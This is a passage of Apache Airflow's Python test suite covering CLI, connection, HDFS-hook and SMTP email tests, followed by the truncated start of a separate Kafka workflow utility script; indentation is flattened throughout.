        # Check that each added connection was stored as expected
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as file:
json.dump(pool_config_input, file)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as file:
pool_config_output = json.load(file)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Set a dict
cli.variables(self.parser.parse_args([
'variables', '-s', 'dict', '{"foo": "oops"}']))
# Set a list
cli.variables(self.parser.parse_args([
'variables', '-s', 'list', '["oops"]']))
# Set str
cli.variables(self.parser.parse_args([
'variables', '-s', 'str', 'hello string']))
# Set int
cli.variables(self.parser.parse_args([
'variables', '-s', 'int', '42']))
# Set float
cli.variables(self.parser.parse_args([
'variables', '-s', 'float', '42.0']))
# Set true
cli.variables(self.parser.parse_args([
'variables', '-s', 'true', 'true']))
# Set false
cli.variables(self.parser.parse_args([
'variables', '-s', 'false', 'false']))
# Set none
cli.variables(self.parser.parse_args([
'variables', '-s', 'null', 'null']))
# Export and then import
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables3.json']))
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables3.json']))
# Assert value
self.assertEqual({'foo': 'oops'}, models.Variable.get('dict', deserialize_json=True))
self.assertEqual(['oops'], models.Variable.get('list', deserialize_json=True))
self.assertEqual('hello string', models.Variable.get('str')) # cannot json.loads(str)
self.assertEqual(42, models.Variable.get('int', deserialize_json=True))
self.assertEqual(42.0, models.Variable.get('float', deserialize_json=True))
self.assertEqual(True, models.Variable.get('true', deserialize_json=True))
self.assertEqual(False, models.Variable.get('false', deserialize_json=True))
self.assertEqual(None, models.Variable.get('null', deserialize_json=True))
os.remove('variables1.json')
os.remove('variables2.json')
os.remove('variables3.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as file:
return int(file.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
args = self.parser.parse_args(['webserver'])
with conf_vars({('webserver', 'web_server_master_timeout'): '10'}):
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class FakeWebHDFSHook:
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient:
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook:
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
class WebHDFSHookTest(unittest.TestCase):
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
snakebite = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
with conf_vars({('email', 'EMAIL_BACKEND'): 'tests.core.send_email_test'}):
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = 'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual('attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({('smtp', 'SMTP_SSL'): 'True'}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({
('smtp', 'SMTP_USER'): None,
('smtp', 'SMTP_PASSWORD'): None,
}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
workflow_util.py
|
import csv
import os
import time
import threading
from subprocess import Popen
from typing import Dict
from uuid import uuid1
import pandas as pd
import yaml
from notification_service.client import NotificationClient
from notification_service.base_notification import EventWatcher, BaseEvent
from kafka import KafkaProducer, KafkaAdminClient, KafkaConsumer
from kafka.admin import NewTopic
from typing import List
import sys
import getopt
import json
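# Rough usage sketch (assumption: the topic names and broker address are only
# illustrative; they map onto the --input_topic/--output_topic/--server flags
# parsed in the __main__ block at the bottom of this file):
#   python workflow_util.py --input_topic=input --output_topic=output --server=localhost:9092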
def init_kafka(bootstrap_servers, input_topic, output_topic):
admin_client = KafkaAdminClient(bootstrap_servers=bootstrap_servers)
topics = admin_client.list_topics()
if input_topic not in topics:
print("create input topic: "+input_topic)
admin_client.create_topics(
new_topics=[NewTopic(name=input_topic, num_partitions=1, replication_factor=1)])
if output_topic not in topics:
print("create output topic: "+output_topic)
admin_client.create_topics(
new_topics=[NewTopic(name=output_topic, num_partitions=1, replication_factor=1)])
def push_kafka(bootstrap_servers, input_filename, input_topic):
producer = KafkaProducer(
bootstrap_servers=bootstrap_servers,
value_serializer=lambda v: v.encode())
f = open(input_filename)
while True:
line = f.readline()
if not line:
break
line = line.strip()
producer.send(input_topic, value=line)
time.sleep(0.004)
time.sleep(10)
def listen_kafka(bootstrap_servers, output_filename, input_topic, output_topic):
consumer = KafkaConsumer(
input_topic,
bootstrap_servers=bootstrap_servers,
auto_offset_reset='earliest',
consumer_timeout_ms=1000
)
input_time = {}
for message in consumer:
input_time[int(message.value.decode().split(',')[0])
] = message.timestamp
print('received ' + str(len(input_time)) + ' messages from input topic.')
time.sleep(10)
consumer = KafkaConsumer(
output_topic,
bootstrap_servers=bootstrap_servers,
auto_offset_reset='earliest',
consumer_timeout_ms=1000
)
output_time = {}
output_label = {}
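    # Assumption inferred from the parsing below: each output record looks roughly like
    #   <uid>,"{""data"": [<label>]}"
    # i.e. a uid followed by a quoted JSON payload whose first "data" element is the label.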
for message in consumer:
line = message.value.decode().strip()
uid = int(line.split(',')[0])
output_time[uid] = message.timestamp
output_label[uid] = int(json.loads(','.join(line.split(',')[1:])[
1:-1].replace('""', '"'))['data'][0])
print('received ' + str(len(output_time)) + ' messages from output topic.')
resultf = open(output_filename, 'w+')
for uid in input_time:
if uid not in output_label or uid not in output_time:
continue
resultf.writelines(['{},{},{},{}\n'.format(
uid, input_time[uid], output_time[uid], output_label[uid])])
print('kafka messages have been written to ' + output_filename)
def send_timed_event():
time.sleep(60 * 15)
notification_client = NotificationClient(
'127.0.0.1:50051', default_namespace="default")
notification_client.send_event(
BaseEvent(key='KafkaWatcher', value='model_registered'))
class KafkaWatcher(EventWatcher):
def __init__(self, bootstrap_servers, input_topic, output_topic):
super().__init__()
self.bootstrap_servers = bootstrap_servers
self.input_topic = input_topic
self.output_topic = output_topic
self.count = 0
self.t = threading.Thread(
target=send_timed_event, name='send_timed_event')
self.t.daemon = True
def process(self, events: List[BaseEvent]):
print("watcher event triggered " + str(self.count))
time.sleep(20)
if self.count == 0:
push_kafka(self.bootstrap_servers,
'/tcdata/predict0.csv', self.input_topic)
listen_kafka(self.bootstrap_servers, './result.csv',
self.input_topic, self.output_topic)
notification_client = NotificationClient(
'127.0.0.1:50051', default_namespace="default")
notification_client.send_event(
BaseEvent(key='train_job', value='start'))
self.t.start()
else:
push_kafka(self.bootstrap_servers,
'/tcdata/predict1.csv', self.input_topic)
listen_kafka(self.bootstrap_servers, './result.csv',
self.input_topic, self.output_topic)
sys.exit()
print("watcher event finished " + str(self.count))
self.count += 1
if __name__ == '__main__':
opts, args = getopt.getopt(
